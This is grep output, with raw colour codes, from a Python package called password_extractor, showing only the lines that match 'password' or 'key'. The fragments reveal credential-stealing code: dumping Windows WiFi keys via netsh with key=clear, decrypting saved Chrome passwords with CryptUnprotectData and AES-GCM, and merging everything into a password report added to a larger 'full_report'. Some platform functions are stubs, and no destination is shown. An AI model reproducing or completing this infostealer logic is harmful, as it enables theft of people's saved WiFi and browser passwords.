[35msetup.py[m[36m:[m    name="[1;31mpassword[m_extractor",
[35msetup.py[m[36m:[m            "[1;31mpassword[m-extractor=[1;31mpassword[m_extractor.main:main",
[35msrc/password_extractor/main.py[m[36m:[mimport [1;31mkey[mring
[35msrc/password_extractor/main.py[m[36m:[mdef get_wifi_[1;31mpassword[ms():
[35msrc/password_extractor/main.py[m[36m:[m    """Retrieve WiFi [1;31mpassword[ms with platform-specific methods"""
[35msrc/password_extractor/main.py[m[36m:[m    """Windows WiFi [1;31mpassword[m extraction"""
[35msrc/password_extractor/main.py[m[36m:[m                ['netsh', 'wlan', 'show', 'profile', name, '[1;31mkey[m=clear'],
[35msrc/password_extractor/main.py[m[36m:[m            [1;31mpassword[m_match = re.search(r'Key Content\s*: (.*)', profile_info)
[35msrc/password_extractor/main.py[m[36m:[m            if [1;31mpassword[m_match:
[35msrc/password_extractor/main.py[m[36m:[m                results += f"WiFi: {name:<30}| Password: {[1;31mpassword[m_match.group(1)}\n"
[35msrc/password_extractor/main.py[m[36m:[m    """Linux WiFi [1;31mpassword[m extraction"""
[35msrc/password_extractor/main.py[m[36m:[m    """macOS WiFi [1;31mpassword[m extraction"""
[35msrc/password_extractor/main.py[m[36m:[mdef decrypt_chrome_[1;31mpassword[m(encrypted_[1;31mpassword[m, [1;31mkey[m=None):
[35msrc/password_extractor/main.py[m[36m:[m    """Decrypt Chrome [1;31mpassword[ms with platform-specific methods"""
[35msrc/password_extractor/main.py[m[36m:[m            return _decrypt_chrome_windows(encrypted_[1;31mpassword[m)
[35msrc/password_extractor/main.py[m[36m:[m        elif system in ['Linux', 'Darwin'] and [1;31mkey[m:
[35msrc/password_extractor/main.py[m[36m:[m            return _decrypt_chrome_unix(encrypted_[1;31mpassword[m, [1;31mkey[m)
[35msrc/password_extractor/main.py[m[36m:[mdef _decrypt_chrome_windows(encrypted_[1;31mpassword[m):
[35msrc/password_extractor/main.py[m[36m:[m    """Windows Chrome [1;31mpassword[m decryption"""
[35msrc/password_extractor/main.py[m[36m:[m    return win32crypt.CryptUnprotectData(encrypted_[1;31mpassword[m, None, None, None, 0)[1].decode()
[35msrc/password_extractor/main.py[m[36m:[mdef _decrypt_chrome_unix(encrypted_[1;31mpassword[m, [1;31mkey[m):
[35msrc/password_extractor/main.py[m[36m:[m    """Linux/macOS Chrome [1;31mpassword[m decryption"""
[35msrc/password_extractor/main.py[m[36m:[m        iv = encrypted_[1;31mpassword[m[3:15]
[35msrc/password_extractor/main.py[m[36m:[m        payload = encrypted_[1;31mpassword[m[15:]
[35msrc/password_extractor/main.py[m[36m:[m        cipher = AES.new([1;31mkey[m, AES.MODE_GCM, iv)
[35msrc/password_extractor/main.py[m[36m:[mdef get_chrome_[1;31mpassword[ms():
[35msrc/password_extractor/main.py[m[36m:[m    """Retrieve Chrome [1;31mpassword[ms with platform-specific paths"""
[35msrc/password_extractor/main.py[m[36m:[m    """Windows Chrome [1;31mpassword[m extraction"""
[35msrc/password_extractor/main.py[m[36m:[m    return "Windows Chrome [1;31mpassword[ms"
[35msrc/password_extractor/main.py[m[36m:[m    """Linux Chrome [1;31mpassword[m extraction"""
[35msrc/password_extractor/main.py[m[36m:[m    return "Linux Chrome [1;31mpassword[ms"
[35msrc/password_extractor/main.py[m[36m:[m    """macOS Chrome [1;31mpassword[m extraction"""
[35msrc/password_extractor/main.py[m[36m:[m    return "macOS Chrome [1;31mpassword[ms"
[35msrc/password_extractor/main.py[m[36m:[mdef get_system_[1;31mpassword[ms():
[35msrc/password_extractor/main.py[m[36m:[m    """Compile [1;31mpassword[m report from all sources"""
[35msrc/password_extractor/main.py[m[36m:[m    [1;31mpassword[m_data = "\n[PASSWORD REPORT]\n"
[35msrc/password_extractor/main.py[m[36m:[m    [1;31mpassword[m_data += "\n[WIFI PASSWORDS]\n" + get_wifi_[1;31mpassword[ms()
[35msrc/password_extractor/main.py[m[36m:[m    [1;31mpassword[m_data += "\n[CHROME PASSWORDS]\n" + get_chrome_[1;31mpassword[ms()
[35msrc/password_extractor/main.py[m[36m:[m    return [1;31mpassword[m_data
[35msrc/password_extractor/main.py[m[36m:[m    [1;31mpassword[m_data = get_system_[1;31mpassword[ms()
[35msrc/password_extractor/main.py[m[36m:[m    full_report = data + [1;31mpassword[m_data
